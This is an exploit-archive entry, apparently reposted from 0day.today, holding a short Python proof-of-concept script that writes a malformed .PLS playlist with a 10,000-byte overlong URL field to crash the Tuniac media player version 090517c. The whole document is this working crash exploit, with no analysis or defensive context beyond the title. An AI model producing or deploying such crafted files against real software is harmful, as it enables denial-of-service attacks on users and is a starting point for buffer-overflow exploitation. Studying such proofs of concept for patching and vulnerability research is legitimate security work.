id: 7012
date: 09/13/2009
title: Tuniac v.090517c (.PLS File) Local Crash PoC
author: zAx
cves: 

============================================
Tuniac v.090517c (.PLS File) Local Crash PoC
============================================


#!/usr/bin/env python
# Tuniac v.090517c (.PLS) Crash PoC
# By : zAx
# http://sourceforge.net/projects/tuniac/files/tuniac/090517/Tuniac_Setup_090517c.exe/download

buffer = ("[playlist]\x0ANumberOfEntries=1\x0AFile1=http://" + "\x41" * (10000));

f = open('Crash_Poc.PLS','w');
f.write(buffer);
f.close();



#  0day.today [2023-03-24]  #